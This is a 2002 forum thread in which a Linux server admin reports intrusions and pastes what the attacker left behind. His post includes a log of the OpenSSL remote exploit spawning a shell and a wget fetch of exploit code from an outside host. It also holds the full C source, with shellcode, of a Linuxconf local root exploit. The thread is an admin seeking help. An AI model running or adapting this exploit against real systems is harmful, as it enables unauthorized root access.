Guest tcreek Posted December 10, 2002 I have Mandrake V8 installed for my server. For the past 3 weeks, and 3 times, intruders have been getting into my system, gaining privileged access and setting up accounts. I finally found out how they are doing it after one of the "script kiddies" made a mistake and left behind a binary file used to exploit my system. Using a hex editor I was able to find more information on this exploit. Looking at the code, it obviously affects the linuxconf file. Looking at the linuxconf date shows that it was accessed 3 days before the intruder, but looking at the services panel, many services were stopped and set to not run on system boot. One of the services was syslog. As a note, my system logs were missing for the times the intruder was in the system. Apparently they have been getting in using an exploit in SSHD, as I found on a hacker board. It does not, however, include all of what was done to get initial access into the system.
pistone@Holmes openssl-too-open]$ ./openssl -a 0x13 -v 201.25.144.xx : openssl-too-open : OpenSSL remote exploit by Solar Eclipse : Opening 30 connections Establishing SSL connections -> ssl_connect_host -> ssl_connect_host -> ssl_connect_host -> ssl_connect_host : Using the OpenSSL info leak to retrieve the addresses -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl0 : 0x8132108 -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl1 : 0x8132108 -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl2 : 0x8132108 : Sending shellcode -> send_client_hello -> get_server_hello ciphers: 0x8132108 start_addr: 0x8132048 SHELLCODE_OFS: 208 -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_error Execution of stage1 shellcode succeeded, sending stage2 Spawning shell... bash: no job control in this shell bash-2.04$ bash-2.04$ uname -a; id; w; Linux linux 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown uid=48(apache) gid=48(apache) groups=48(apache) 4:57am up 88 days, 18:16, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty2 - 7Oct02 8days 0.76s 0.02s xinit /etc/X11/ root pts/0 - 7Oct02 8days 0.02s 0.02s /bin/cat bash-2.04$cd /tmp bash-2.04$wget http://packetstormsecurity.nl/0209-exploits/nslconf.c bash-2.04$gcc -o nslconf nslconf.c bash-2.04$./nslconf [ Linuxconf Local Xploit by RaiSe ] * Directory + file created .. [dont forget to delete it ] [* Looking at %esp .. ] [* Looking at: 0xbffff5f8 ] [* Shellcode found at: 0xbffff7a4 ] [* Xploting .. 
] id uid=0(root) gid=48(apache) groups=48(apache) And here is the code that was ggc'd from the above quoted : /* * Linuxconf <= 1.28r3 local xploit * by RaiSe <raise@netsearch-ezine.com> * http://www.netsearch-ezine.com * * Tested on: * Mandrake 8.0 * Mandrake 8.2 * RedHat 7.3 * * (run without args on directory * with +w) */ #include <stdio.h> #include <stdlib.h> #include <sys/ptrace.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> #include <asm/user.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #define PATHLCONF "/sbin/linuxconf" unsigned long get_shell(void); char shellcode[]= // by RaiSe "x90x90x90x90x90x90x90x90" "x31xc0x31xdbx31xc9xb0x46xcdx80x31xc9x51xb8x38" "x65x73x68x66x35x56x4ax50xb8x65x65x62x69x66x35" "x4ax4ax50x89xe3x51x53x89xe1x31xd2x31xc0xb0x0b" "xcdx80"; int main(void) { FILE *fp; char buf[2056], buf2[2048]; unsigned long shell, *p; int i; printf("n[ Linuxconf Local Xploit by RaiSe ]nn"); fflush(stdout); sprintf(buf2, "%s.eng", shellcode); if (mkdir(buf2, S_IRWXU)) { fprintf(stderr, "* Error at creat directory (.eng), +w? 
is it exist?, " "delete it and run again.nn"); exit(-1); } else sprintf(buf2, "%s.eng/%s.eng", shellcode, shellcode); if ((fp = fopen(buf2, "w")) == NULL) { fprintf(stderr, "* Error at creat file, +w?nn"); exit(-1); } else fclose(fp); printf("* Directory + file created ..n"); printf(" [dont forget to delete it;)]n"); fflush(stdout); bzero(buf, sizeof(buf)); shell = get_shell(); p = (unsigned long *) buf; for (i = 0; i < 2048; i+=4) *p++ = shell; setenv("SCODE", shellcode, 1); setenv("LINUXCONF_LANG",buf,1); execl(PATHLCONF, "linuxconf", NULL); exit(-1); } /******* end of main() ******/ unsigned long get_shell(void) { unsigned long sc; struct user_regs_struct regs; int pid_vuln, n; /* creamos un proceso */ if (!(pid_vuln = fork())) { char buf[2056]; sleep(2); bzero(buf, sizeof(buf)); memset(buf, 0x41, 2048); setenv("SCODE", shellcode, 1); setenv("LINUXCONF_LANG",buf, 1); execl(PATHLCONF, "linuxconf", NULL); fprintf(stderr, "Error: execl.n"); exit(-1); } else { if (ptrace(PTRACE_ATTACH, pid_vuln)) { fprintf(stderr, "Error: PTRACE_ATTACH.n"); exit(-1); } waitpid(pid_vuln, NULL, 0); printf("n[* Looking at %%esp .. ]n"); fflush(stdout); if (ptrace(PTRACE_CONT, pid_vuln, 0, 0)) { fprintf(stderr, "Error: PTRACE_CONT.n"); exit(-1); } waitpid(pid_vuln, NULL, 0); if (ptrace(PTRACE_GETREGS, pid_vuln, 0, ®s)) { fprintf(stderr, "Error: PTRACE_GETREGS.n"); exit(-1); } printf("[* Looking at: 0x%08x ]n", (int) regs.esp); fflush(stdout); n = 0, sc = 0; do { if ((sc = ptrace(PTRACE_PEEKTEXT, pid_vuln, (int)(regs.esp+(n++)), 0)) == -1) { fprintf(stderr, "Error: PTRACE_PEEKTEXT.n"); exit(-1); } } while (sc != 0x90909090); n--; printf("[* Shellcode found at: 0x%08x ]n", (int)(regs.esp + n)); fflush(stdout); if(ptrace(PTRACE_KILL, pid_vuln, 0, 0)) { fprintf(stderr, "Error: PTRACE_KILL.n"); exit(-1); } else { waitpid(pid_vuln, NULL, 0); printf("[* Xploting .. 
]nn"); fflush(stdout); sleep(1); return((unsigned long)(regs.esp + n)); } } } /********* enf of get_shell() **********/ /* EOF */ I ended up in having to shutdown my SSH server. I really need to be able to log into my system remotly as well as others. Is there an updated SSHD to upgrade to, or another to use?? Thank you. Trent Quote Link to comment Share on other sites More sharing options...
Guest arise Posted December 10, 2002 This could be a very serious issue, if it's not an already known exploit! Surprising how many people actually bothered to reply to your message until now :( What exact version of SSH are you running? Try to patch it, or better, dump it and try OpenSSH instead. Please let me know how the matter develops...
Guest tcreek Posted December 11, 2002 If you notice the second line of the "quoted" text above: OpenSSL remote exploit. I was using openssh server version 2.5.2p2-3mdk. Trent
Guest tcreek Posted December 11, 2002 I did find this security advisory: http://www.openssh.com/txt/preauth.adv
Ronin Posted December 11, 2002 "If you notice the second line of the "quoted" text above: OpenSSL remote exploit. I was using openssh server version 2.5.2p2-3mdk. Trent" Hasn't that been fixed a version or two ago, though?
Guest tcreek Posted December 11, 2002 Actually no. According to the OpenSSL.org site you have to upgrade all the way up to version 3.4.